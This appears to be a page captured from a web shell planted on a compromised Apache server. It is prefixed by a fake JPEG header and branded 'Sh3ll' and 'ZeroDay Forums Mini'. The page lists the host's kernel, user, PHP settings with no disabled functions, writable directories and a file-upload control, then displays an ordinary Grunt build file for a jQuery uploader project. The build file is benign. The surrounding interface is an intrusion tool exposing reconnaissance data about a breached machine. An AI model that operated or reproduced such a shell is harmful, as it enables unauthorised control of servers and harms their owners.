ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/hls4.vidoe.top/uploader-master/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/hls4.vidoe.top/uploader-master/Gruntfile.js
module.exports = function(grunt) {
"use strict";

  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON("package.json"),

    uglify: {
      options: {
        output: {
          comments: "some"
        }
      },
      build: {
        files: [{
          src: "src/js/jquery.dm-uploader.js",
          dest: "dist/js/jquery.dm-uploader.min.js"
        }]
      }
    },

    jshint: {
      options: {
        jshintrc: true
      },
      all: [
        "src/js/*.js",
        "Gruntfile.js"
      ]
    },

    cssmin: {
      target: {
        files: {
          "dist/css/jquery.dm-uploader.min.css": ["src/css/*.css"]
        }
      }
    },

    watch: {
      js: {
        files: ["src/js/*.js"],
        tasks: ["jshint", "uglify"],
        options: {
          spawn: false,
        }
      },
      css: {
        files: ["src/css/*.css"],
        tasks: ["cssmin"],
        options: {
          spawn: false,
        }
      }
    }
  });

  // Load the plugin that provides the "uglify" task.
  grunt.loadNpmTasks("grunt-contrib-uglify");
  grunt.loadNpmTasks("grunt-contrib-jshint");
  grunt.loadNpmTasks("grunt-contrib-watch");
  grunt.loadNpmTasks("grunt-contrib-cssmin");
  
  grunt.registerTask("test", ["jshint"]);
  grunt.registerTask("build", ["uglify", "cssmin"]);

  grunt.registerTask("default", ["watch"]);
};

ZeroDay Forums Mini